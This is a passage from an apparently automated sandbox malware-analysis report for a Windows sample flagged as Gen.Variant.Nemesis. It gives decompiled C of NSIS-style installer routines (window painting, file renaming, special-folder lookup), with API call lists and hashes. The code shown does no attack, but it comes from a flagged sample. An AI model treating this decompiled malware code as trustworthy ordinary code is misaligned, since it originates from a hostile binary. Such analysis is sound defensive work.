                                                                        				return _t12;
                                                                        			}



















                                                                        0x004062ae
                                                                        0x004062b7
                                                                        0x004062be
                                                                        0x004062c8
                                                                        0x004062dc
                                                                        0x00406304
                                                                        0x0040630b
                                                                        0x0040630f
                                                                        0x00406313
                                                                        0x00406333
                                                                        0x0040633a
                                                                        0x00406344
                                                                        0x00406351
                                                                        0x00406356
                                                                        0x0040635b
                                                                        0x0040635f
                                                                        0x0040636e
                                                                        0x00406370
                                                                        0x0040637d
                                                                        0x00406381
                                                                        0x0040641c
                                                                        0x00000000
                                                                        0x00406397
                                                                        0x004063a4
                                                                        0x004063c8
                                                                        0x004063cc
                                                                        0x004063eb
                                                                        0x004063ef
                                                                        0x004063ef
                                                                        0x004063f1
                                                                        0x004063fa
                                                                        0x00406405
                                                                        0x00406410
                                                                        0x00406416
                                                                        0x00000000
                                                                        0x00406416
                                                                        0x004063ce
                                                                        0x004063d1
                                                                        0x004063dc
                                                                        0x004063d8
                                                                        0x004063da
                                                                        0x004063db
                                                                        0x004063db
                                                                        0x004063e3
                                                                        0x004063e5
                                                                        0x00000000
                                                                        0x004063e5
                                                                        0x004063af
                                                                        0x004063b5
                                                                        0x00000000
                                                                        0x004063b5
                                                                        0x00406381
                                                                        0x0040635f
                                                                        0x004062de
                                                                        0x004062e9
                                                                        0x004062f2
                                                                        0x004062f6
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x004062f6
                                                                        0x00406427

                                                                        APIs
                                                                        • CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,00000000,?,?,00406449,?,?), ref: 004062E9
                                                                        • GetShortPathNameW.KERNEL32 ref: 004062F2
                                                                          • Part of subcall function 004060BD: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,004063A2,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 004060CD
                                                                          • Part of subcall function 004060BD: lstrlenA.KERNEL32(00000000,?,00000000,004063A2,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 004060FF
                                                                        • GetShortPathNameW.KERNEL32 ref: 0040630F
                                                                        • wsprintfA.USER32 ref: 0040632D
                                                                        • GetFileSize.KERNEL32(00000000,00000000,004275E8,C0000000,00000004,004275E8,?,?,?,?,?), ref: 00406368
                                                                        • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 00406377
                                                                        • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 004063AF
                                                                        • SetFilePointer.KERNEL32(0040A5B0,00000000,00000000,00000000,00000000,004269E8,00000000,-0000000A,0040A5B0,00000000,[Rename],00000000,00000000,00000000), ref: 00406405
                                                                        • GlobalFree.KERNEL32 ref: 00406416
                                                                        • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 0040641D
                                                                          • Part of subcall function 00406158: GetFileAttributesW.KERNELBASE(00000003,00403113,C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.6939.7902.exe,80000000,00000003), ref: 0040615C
                                                                          • Part of subcall function 00406158: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 0040617E
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.882263654.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.882255021.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.882283133.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.882292421.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.882342652.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.882351128.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.882361743.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.882369815.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.882380197.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                        Similarity
                                                                        • API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
                                                                        • String ID: %ls=%ls$[Rename]$mB$uB$uB
                                                                        • API String ID: 2171350718-2295842750
                                                                        • Opcode ID: 1440962ef2f3b8112e1664fd7ccaf364af2d80964e03d16af1fd95ff0e1f48f4
                                                                        • Instruction ID: df9b4e9fb9d32bd4c250032a1d399944af7a2e4c2f0bdec2b7d3959d12e60cc8
                                                                        • Opcode Fuzzy Hash: 1440962ef2f3b8112e1664fd7ccaf364af2d80964e03d16af1fd95ff0e1f48f4
                                                                        • Instruction Fuzzy Hash: B8314331200315BBD2206B619D49F5B3AACEF85704F16003BFD02FA2C2EA7DD82186BD
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 90%
                                                                        			E00401000(struct HWND__* _a4, void* _a8, signed int _a12, void* _a16) {
                                                                        				struct tagLOGBRUSH _v16;
                                                                        				struct tagRECT _v32;
                                                                        				struct tagPAINTSTRUCT _v96;
                                                                        				struct HDC__* _t70;
                                                                        				struct HBRUSH__* _t87;
                                                                        				struct HFONT__* _t94;
                                                                        				long _t102;
                                                                        				signed int _t126;
                                                                        				struct HDC__* _t128;
                                                                        				intOrPtr _t130;
                                                                        
                                                                        				if(_a8 == 0xf) {
                                                                        					_t130 =  *0x42a270;
                                                                        					_t70 = BeginPaint(_a4,  &_v96);
                                                                        					_v16.lbStyle = _v16.lbStyle & 0x00000000;
                                                                        					_a8 = _t70;
                                                                        					GetClientRect(_a4,  &_v32);
                                                                        					_t126 = _v32.bottom;
                                                                        					_v32.bottom = _v32.bottom & 0x00000000;
                                                                        					while(_v32.top < _t126) {
                                                                        						_a12 = _t126 - _v32.top;
                                                                        						asm("cdq");
                                                                        						asm("cdq");
                                                                        						asm("cdq");
                                                                        						_v16.lbColor = 0 << 0x00000008 | (( *(_t130 + 0x50) & 0x000000ff) * _a12 + ( *(_t130 + 0x54) & 0x000000ff) * _v32.top) / _t126 & 0x000000ff;
                                                                        						_t87 = CreateBrushIndirect( &_v16);
                                                                        						_v32.bottom = _v32.bottom + 4;
                                                                        						_a16 = _t87;
                                                                        						FillRect(_a8,  &_v32, _t87);
                                                                        						DeleteObject(_a16);
                                                                        						_v32.top = _v32.top + 4;
                                                                        					}
                                                                        					if( *(_t130 + 0x58) != 0xffffffff) {
                                                                        						_t94 = CreateFontIndirectW( *(_t130 + 0x34));
                                                                        						_a16 = _t94;
                                                                        						if(_t94 != 0) {
                                                                        							_t128 = _a8;
                                                                        							_v32.left = 0x10;
                                                                        							_v32.top = 8;
                                                                        							SetBkMode(_t128, 1);
                                                                        							SetTextColor(_t128,  *(_t130 + 0x58));
                                                                        							_a8 = SelectObject(_t128, _a16);
                                                                        							DrawTextW(_t128, 0x429260, 0xffffffff,  &_v32, 0x820);
                                                                        							SelectObject(_t128, _a8);
                                                                        							DeleteObject(_a16);
                                                                        						}
                                                                        					}
                                                                        					EndPaint(_a4,  &_v96);
                                                                        					return 0;
                                                                        				}
                                                                        				_t102 = _a16;
                                                                        				if(_a8 == 0x46) {
                                                                        					 *(_t102 + 0x18) =  *(_t102 + 0x18) | 0x00000010;
                                                                        					 *((intOrPtr*)(_t102 + 4)) =  *0x42a268;
                                                                        				}
                                                                        				return DefWindowProcW(_a4, _a8, _a12, _t102);
                                                                        			}













                                                                        0x0040100a
                                                                        0x00401039
                                                                        0x00401047
                                                                        0x0040104d
                                                                        0x00401051
                                                                        0x0040105b
                                                                        0x00401061
                                                                        0x00401064
                                                                        0x004010f3
                                                                        0x00401089
                                                                        0x0040108c
                                                                        0x004010a6
                                                                        0x004010bd
                                                                        0x004010cc
                                                                        0x004010cf
                                                                        0x004010d5
                                                                        0x004010d9
                                                                        0x004010e4
                                                                        0x004010ed
                                                                        0x004010ef
                                                                        0x004010ef
                                                                        0x00401100
                                                                        0x00401105
                                                                        0x0040110d
                                                                        0x00401110
                                                                        0x00401112
                                                                        0x00401118
                                                                        0x0040111f
                                                                        0x00401126
                                                                        0x00401130
                                                                        0x00401142
                                                                        0x00401156
                                                                        0x00401160
                                                                        0x00401165
                                                                        0x00401165
                                                                        0x00401110
                                                                        0x0040116e
                                                                        0x00000000
                                                                        0x00401178
                                                                        0x00401010
                                                                        0x00401013
                                                                        0x00401015
                                                                        0x0040101f
                                                                        0x0040101f
                                                                        0x00000000

                                                                        APIs
                                                                        • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                                                                        • BeginPaint.USER32(?,?), ref: 00401047
                                                                        • GetClientRect.USER32 ref: 0040105B
                                                                        • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                                        • FillRect.USER32 ref: 004010E4
                                                                        • DeleteObject.GDI32(?), ref: 004010ED
                                                                        • CreateFontIndirectW.GDI32(?), ref: 00401105
                                                                        • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                                                        • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                                                        • SelectObject.GDI32(00000000,?), ref: 00401140
                                                                        • DrawTextW.USER32(00000000,00429260,000000FF,00000010,00000820), ref: 00401156
                                                                        • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                                        • DeleteObject.GDI32(?), ref: 00401165
                                                                        • EndPaint.USER32(?,?), ref: 0040116E
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.882263654.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.882255021.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.882283133.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.882292421.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.882342652.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.882351128.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.882361743.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.882369815.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.882380197.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                        Similarity
                                                                        • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                                        • String ID: F
                                                                        • API String ID: 941294808-1304234792
                                                                        • Opcode ID: 8da9fae8b34351ceae2931000ebd9f39a308799c7d87b7a6dbcfe72b45b7384c
                                                                        • Instruction ID: e2f9fea5dfd6f059ba8eeb08e8d10ac227d01a2162b8a260283931f50cd0bfbf
                                                                        • Opcode Fuzzy Hash: 8da9fae8b34351ceae2931000ebd9f39a308799c7d87b7a6dbcfe72b45b7384c
                                                                        • Instruction Fuzzy Hash: 33418B71800209EFCF058FA5DE459AF7BB9FF45315F00802AF991AA2A0C7349A55DFA4
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 72%
                                                                        			E004066A5(void* __ebx, void* __edi, void* __esi, signed int _a4, short _a8) {
                                                                        				struct _ITEMIDLIST* _v8;
                                                                        				signed int _v12;
                                                                        				signed int _v16;
                                                                        				signed int _v20;
                                                                        				signed int _v24;
                                                                        				signed int _v28;
                                                                        				signed int _t44;
                                                                        				WCHAR* _t45;
                                                                        				signed char _t47;
                                                                        				signed int _t48;
                                                                        				short _t59;
                                                                        				short _t61;
                                                                        				short _t63;
                                                                        				void* _t71;
                                                                        				signed int _t77;
                                                                        				signed int _t78;
                                                                        				short _t81;
                                                                        				short _t82;
                                                                        				signed char _t84;
                                                                        				signed int _t85;
                                                                        				void* _t98;
                                                                        				void* _t104;
                                                                        				intOrPtr* _t105;
                                                                        				void* _t107;
                                                                        				WCHAR* _t108;
                                                                        				void* _t110;
                                                                        
                                                                        				_t107 = __esi;
                                                                        				_t104 = __edi;
                                                                        				_t71 = __ebx;
                                                                        				_t44 = _a8;
                                                                        				if(_t44 < 0) {
                                                                        					_t44 =  *( *0x42923c - 4 + _t44 * 4);
                                                                        				}
                                                                        				_push(_t71);
                                                                        				_push(_t107);
                                                                        				_push(_t104);
                                                                        				_t105 =  *0x42a298 + _t44 * 2;
                                                                        				_t45 = 0x428200;
                                                                        				_t108 = 0x428200;
                                                                        				if(_a4 >= 0x428200 && _a4 - 0x428200 >> 1 < 0x800) {
                                                                        					_t108 = _a4;
                                                                        					_a4 = _a4 & 0x00000000;
                                                                        				}
                                                                        				_t81 =  *_t105;
                                                                        				_a8 = _t81;
                                                                        				if(_t81 == 0) {
                                                                        					L43:
                                                                        					 *_t108 =  *_t108 & 0x00000000;
                                                                        					if(_a4 == 0) {
                                                                        						return _t45;
                                                                        					}
                                                                        					return E00406668(_a4, _t45);
                                                                        				} else {
                                                                        					while((_t108 - _t45 & 0xfffffffe) < 0x800) {
                                                                        						_t98 = 2;
                                                                        						_t105 = _t105 + _t98;
                                                                        						if(_t81 >= 4) {
                                                                        							if(__eflags != 0) {
                                                                        								 *_t108 = _t81;
                                                                        								_t108 = _t108 + _t98;
                                                                        								__eflags = _t108;
                                                                        							} else {
                                                                        								 *_t108 =  *_t105;
                                                                        								_t108 = _t108 + _t98;
                                                                        								_t105 = _t105 + _t98;
                                                                        							}
                                                                        							L42:
                                                                        							_t82 =  *_t105;
                                                                        							_a8 = _t82;
                                                                        							if(_t82 != 0) {
                                                                        								_t81 = _a8;
                                                                        								continue;
                                                                        							}
                                                                        							goto L43;
                                                                        						}
                                                                        						_t84 =  *((intOrPtr*)(_t105 + 1));
                                                                        						_t47 =  *_t105;
                                                                        						_t48 = _t47 & 0x000000ff;
                                                                        						_v12 = (_t84 & 0x0000007f) << 0x00000007 | _t47 & 0x0000007f;
                                                                        						_t85 = _t84 & 0x000000ff;
                                                                        						_v28 = _t48 | 0x00008000;
                                                                        						_t77 = 2;
                                                                        						_v16 = _t85;
                                                                        						_t105 = _t105 + _t77;
                                                                        						_v24 = _t48;
                                                                        						_v20 = _t85 | 0x00008000;
                                                                        						if(_a8 != _t77) {
                                                                        							__eflags = _a8 - 3;
                                                                        							if(_a8 != 3) {
                                                                        								__eflags = _a8 - 1;
                                                                        								if(__eflags == 0) {
                                                                        									__eflags = (_t48 | 0xffffffff) - _v12;
                                                                        									E004066A5(_t77, _t105, _t108, _t108, (_t48 | 0xffffffff) - _v12);
                                                                        								}
                                                                        								L38:
                                                                        								_t108 =  &(_t108[lstrlenW(_t108)]);
                                                                        								_t45 = 0x428200;
                                                                        								goto L42;
                                                                        							}
                                                                        							_t78 = _v12;
                                                                        							__eflags = _t78 - 0x1d;
                                                                        							if(_t78 != 0x1d) {
                                                                        								__eflags = (_t78 << 0xb) + 0x42b000;
                                                                        								E00406668(_t108, (_t78 << 0xb) + 0x42b000);
                                                                        							} else {
                                                                        								E004065AF(_t108,  *0x42a268);
                                                                        							}
                                                                        							__eflags = _t78 + 0xffffffeb - 7;
                                                                        							if(__eflags < 0) {
                                                                        								L29:
                                                                        								E004068EF(_t108);
                                                                        							}
                                                                        							goto L38;
                                                                        						}
                                                                        						if( *0x42a2e4 != 0) {
                                                                        							_t77 = 4;
                                                                        						}
                                                                        						_t121 = _t48;
                                                                        						if(_t48 >= 0) {
                                                                        							__eflags = _t48 - 0x25;
                                                                        							if(_t48 != 0x25) {
                                                                        								__eflags = _t48 - 0x24;
                                                                        								if(_t48 == 0x24) {
                                                                        									GetWindowsDirectoryW(_t108, 0x400);
                                                                        									_t77 = 0;
                                                                        								}
                                                                        								while(1) {
                                                                        									__eflags = _t77;
                                                                        									if(_t77 == 0) {
                                                                        										goto L26;
                                                                        									}
                                                                        									_t59 =  *0x42a264;
                                                                        									_t77 = _t77 - 1;
                                                                        									__eflags = _t59;
                                                                        									if(_t59 == 0) {
                                                                        										L22:
                                                                        										_t61 = SHGetSpecialFolderLocation( *0x42a268,  *(_t110 + _t77 * 4 - 0x18),  &_v8);
                                                                        										__eflags = _t61;
                                                                        										if(_t61 != 0) {
                                                                        											L24:
                                                                        											 *_t108 =  *_t108 & 0x00000000;
                                                                        											__eflags =  *_t108;
                                                                        											continue;
                                                                        										}
                                                                        										__imp__SHGetPathFromIDListW(_v8, _t108);
                                                                        										_a8 = _t61;
                                                                        										__imp__CoTaskMemFree(_v8);
                                                                        										__eflags = _a8;
                                                                        										if(_a8 != 0) {
                                                                        											goto L26;
                                                                        										}
                                                                        										goto L24;
                                                                        									}
                                                                        									_t63 =  *_t59( *0x42a268,  *(_t110 + _t77 * 4 - 0x18), 0, 0, _t108);
                                                                        									__eflags = _t63;
                                                                        									if(_t63 == 0) {
                                                                        										goto L26;
                                                                        									}
                                                                        									goto L22;
                                                                        								}
                                                                        								goto L26;
                                                                        							}
                                                                        							GetSystemDirectoryW(_t108, 0x400);
                                                                        							goto L26;
                                                                        						} else {
                                                                        							E00406536( *0x42a298, _t121, 0x80000002, L"Software\\Microsoft\\Windows\\CurrentVersion",  *0x42a298 + (_t48 & 0x0000003f) * 2, _t108, _t48 & 0x00000040);
                                                                        							if( *_t108 != 0) {
                                                                        								L27:
                                                                        								if(_v16 == 0x1a) {
                                                                        									lstrcatW(_t108, L"\\Microsoft\\Internet Explorer\\Quick Launch");
                                                                        								}
                                                                        								goto L29;
                                                                        							}
                                                                        							E004066A5(_t77, _t105, _t108, _t108, _v16);
                                                                        							L26:
                                                                        							if( *_t108 == 0) {
                                                                        								goto L29;
                                                                        							}
                                                                        							goto L27;
                                                                        						}
                                                                        					}
                                                                        					goto L43;
                                                                        				}
                                                                        			}





























                                                                        0x004066a5
                                                                        0x004066a5
                                                                        0x004066a5
                                                                        0x004066ab
                                                                        0x004066b0
                                                                        0x004066c1
                                                                        0x004066c1
                                                                        0x004066c9
                                                                        0x004066ca
                                                                        0x004066cb
                                                                        0x004066cc
                                                                        0x004066cf
                                                                        0x004066d7
                                                                        0x004066d9
                                                                        0x004066ea
                                                                        0x004066ed
                                                                        0x004066ed
                                                                        0x004066f1
                                                                        0x004066f7
                                                                        0x004066fa
                                                                        0x004068d5
                                                                        0x004068d5
                                                                        0x004068e0
                                                                        0x004068ec
                                                                        0x004068ec
                                                                        0x00000000
                                                                        0x00406700
                                                                        0x00406705
                                                                        0x0040671a
                                                                        0x0040671b
                                                                        0x00406721
                                                                        0x004068b3
                                                                        0x004068c1
                                                                        0x004068c4
                                                                        0x004068c4
                                                                        0x004068b5
                                                                        0x004068b8
                                                                        0x004068bb
                                                                        0x004068bd
                                                                        0x004068bd
                                                                        0x004068c6
                                                                        0x004068c6
                                                                        0x004068cc
                                                                        0x004068cf
                                                                        0x00406702
                                                                        0x00000000
                                                                        0x00406702
                                                                        0x00000000
                                                                        0x004068cf
                                                                        0x00406727
                                                                        0x0040672a
                                                                        0x00406739
                                                                        0x00406740
                                                                        0x0040674c
                                                                        0x0040674f
                                                                        0x00406752
                                                                        0x00406753
                                                                        0x00406758
                                                                        0x0040675e
                                                                        0x00406761
                                                                        0x00406764
                                                                        0x00406857
                                                                        0x0040685c
                                                                        0x0040688f
                                                                        0x00406894
                                                                        0x00406899
                                                                        0x0040689e
                                                                        0x0040689e
                                                                        0x004068a3
                                                                        0x004068a9
                                                                        0x004068ac
                                                                        0x00000000
                                                                        0x004068ac
                                                                        0x0040685e
                                                                        0x00406861
                                                                        0x00406864
                                                                        0x00406879
                                                                        0x00406880
                                                                        0x00406866
                                                                        0x0040686d
                                                                        0x0040686d
                                                                        0x00406888
                                                                        0x0040688b
                                                                        0x0040684f
                                                                        0x00406850
                                                                        0x00406850
                                                                        0x00000000
                                                                        0x0040688b
                                                                        0x00406771
                                                                        0x00406775
                                                                        0x00406775
                                                                        0x00406776
                                                                        0x00406778
                                                                        0x004067b5
                                                                        0x004067b8
                                                                        0x004067c8
                                                                        0x004067cb
                                                                        0x004067d3
                                                                        0x004067d9
                                                                        0x004067d9
                                                                        0x00406834
                                                                        0x00406834
                                                                        0x00406836
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x004067dd
                                                                        0x004067e2
                                                                        0x004067e3
                                                                        0x004067e5
                                                                        0x004067fc
                                                                        0x0040680a
                                                                        0x00406810
                                                                        0x00406812
                                                                        0x00406830
                                                                        0x00406830
                                                                        0x00406830
                                                                        0x00000000
                                                                        0x00406830
                                                                        0x00406818
                                                                        0x00406821
                                                                        0x00406824
                                                                        0x0040682a
                                                                        0x0040682e
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x0040682e
                                                                        0x004067f6
                                                                        0x004067f8
                                                                        0x004067fa
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x004067fa
                                                                        0x00000000
                                                                        0x00406834
                                                                        0x004067c0
                                                                        0x00000000
                                                                        0x0040677a
                                                                        0x00406798
                                                                        0x004067a1
                                                                        0x0040683e
                                                                        0x00406842
                                                                        0x0040684a
                                                                        0x0040684a
                                                                        0x00000000
                                                                        0x00406842
                                                                        0x004067ab
                                                                        0x00406838
                                                                        0x0040683c
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x0040683c
                                                                        0x00406778
                                                                        0x00000000
                                                                        0x00406705

                                                                        APIs
                                                                        • GetSystemDirectoryW.KERNEL32(Call,00000400), ref: 004067C0
                                                                        • GetWindowsDirectoryW.KERNEL32(Call,00000400,00000000,Skipped: C:\Users\user\AppData\Local\Temp\nsyEAEC.tmp\System.dll,?,00405701,Skipped: C:\Users\user\AppData\Local\Temp\nsyEAEC.tmp\System.dll,00000000,00000000,00000000,00000000), ref: 004067D3
                                                                        • lstrcatW.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch), ref: 0040684A
                                                                        • lstrlenW.KERNEL32(Call,00000000,Skipped: C:\Users\user\AppData\Local\Temp\nsyEAEC.tmp\System.dll,?,00405701,Skipped: C:\Users\user\AppData\Local\Temp\nsyEAEC.tmp\System.dll,00000000), ref: 004068A4
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.882263654.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.882255021.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.882283133.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.882292421.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.882342652.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.882351128.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.882361743.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.882369815.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.882380197.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                        Similarity
                                                                        • API ID: Directory$SystemWindowslstrcatlstrlen
                                                                        • String ID: Call$Skipped: C:\Users\user\AppData\Local\Temp\nsyEAEC.tmp\System.dll$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                                        • API String ID: 4260037668-593435091
                                                                        • Opcode ID: 1c129aaeae4721ad32508ffaab04e099ccdaef91abef8552f1ca909acb5604ca
                                                                        • Instruction ID: 414c90a3e727c3679fd522760d05a71ccfd37451a898d0680c6fb4b4ce958948
                                                                        • Opcode Fuzzy Hash: 1c129aaeae4721ad32508ffaab04e099ccdaef91abef8552f1ca909acb5604ca
                                                                        • Instruction Fuzzy Hash: CD61E172A02115EBDB20AF64CD40BAA37A5EF10314F22C13EE946B62D0DB3D49A1CB5D
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 100%
                                                                        			E0040462B(intOrPtr _a4, struct HDC__* _a8, struct HWND__* _a12) {
                                                                        				struct tagLOGBRUSH _v16;
                                                                        				long _t39;
                                                                        				long _t41;
                                                                        				void* _t44;
                                                                        				signed char _t50;
                                                                        				long* _t54;
                                                                        
                                                                        				if(_a4 + 0xfffffecd > 5) {
                                                                        					L18:
                                                                        					return 0;
                                                                        				}
                                                                        				_t54 = GetWindowLongW(_a12, 0xffffffeb);
                                                                        				if(_t54 == 0 || _t54[2] > 1 || _t54[4] > 2) {
                                                                        					goto L18;
                                                                        				} else {
                                                                        					_t50 = _t54[5];
                                                                        					if((_t50 & 0xffffffe0) != 0) {
                                                                        						goto L18;
                                                                        					}
                                                                        					_t39 =  *_t54;
                                                                        					if((_t50 & 0x00000002) != 0) {
                                                                        						_t39 = GetSysColor(_t39);
                                                                        					}
                                                                        					if((_t54[5] & 0x00000001) != 0) {
                                                                        						SetTextColor(_a8, _t39);
                                                                        					}
                                                                        					SetBkMode(_a8, _t54[4]);
                                                                        					_t41 = _t54[1];
                                                                        					_v16.lbColor = _t41;
                                                                        					if((_t54[5] & 0x00000008) != 0) {
                                                                        						_t41 = GetSysColor(_t41);
                                                                        						_v16.lbColor = _t41;
                                                                        					}
                                                                        					if((_t54[5] & 0x00000004) != 0) {
                                                                        						SetBkColor(_a8, _t41);
                                                                        					}
                                                                        					if((_t54[5] & 0x00000010) != 0) {
                                                                        						_v16.lbStyle = _t54[2];
                                                                        						_t44 = _t54[3];
                                                                        						if(_t44 != 0) {
                                                                        							DeleteObject(_t44);
                                                                        						}
                                                                        						_t54[3] = CreateBrushIndirect( &_v16);
                                                                        					}
                                                                        					return _t54[3];
                                                                        				}
                                                                        			}









                                                                        0x0040463d
                                                                        0x004046f3
                                                                        0x00000000
                                                                        0x004046f3
                                                                        0x0040464e
                                                                        0x00404652
                                                                        0x00000000
                                                                        0x0040466c
                                                                        0x0040466c
                                                                        0x00404675
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00404677
                                                                        0x00404683
                                                                        0x00404686
                                                                        0x00404686
                                                                        0x0040468c
                                                                        0x00404692
                                                                        0x00404692
                                                                        0x0040469e
                                                                        0x004046a4
                                                                        0x004046ab
                                                                        0x004046ae
                                                                        0x004046b1
                                                                        0x004046b3
                                                                        0x004046b3
                                                                        0x004046bb
                                                                        0x004046c1
                                                                        0x004046c1
                                                                        0x004046cb
                                                                        0x004046d0
                                                                        0x004046d3
                                                                        0x004046d8
                                                                        0x004046db
                                                                        0x004046db
                                                                        0x004046eb
                                                                        0x004046eb
                                                                        0x00000000
                                                                        0x004046ee

                                                                        APIs
                                                                        • GetWindowLongW.USER32(?,000000EB), ref: 00404648
                                                                        • GetSysColor.USER32(00000000), ref: 00404686
                                                                        • SetTextColor.GDI32(?,00000000), ref: 00404692
                                                                        • SetBkMode.GDI32(?,?), ref: 0040469E
                                                                        • GetSysColor.USER32(?), ref: 004046B1
                                                                        • SetBkColor.GDI32(?,?), ref: 004046C1
                                                                        • DeleteObject.GDI32(?), ref: 004046DB
                                                                        • CreateBrushIndirect.GDI32(?), ref: 004046E5
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.882263654.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.882255021.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.882283133.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.882292421.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.882342652.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.882351128.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.882361743.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.882369815.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.882380197.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                        Similarity
                                                                        • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                                        • String ID:
                                                                        • API String ID: 2320649405-0
                                                                        • Opcode ID: f4fe220c79686689299554ac50abea47664d32920eac269e7a43003585d3568b
                                                                        • Instruction ID: e78b8cc9c8042372c9a7340b9b8aa9b23ded286a9f8ddc7240a2e2d8bd1f46c0
                                                                        • Opcode Fuzzy Hash: f4fe220c79686689299554ac50abea47664d32920eac269e7a43003585d3568b
                                                                        • Instruction Fuzzy Hash: DE2197715007049FC7309F28D908B5BBBF8AF42714F008D2EE992A22E1D739D944DB58
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 85%
                                                                        			E72492480(void* __edx) {
                                                                        				void* _t37;
                                                                        				signed int _t38;
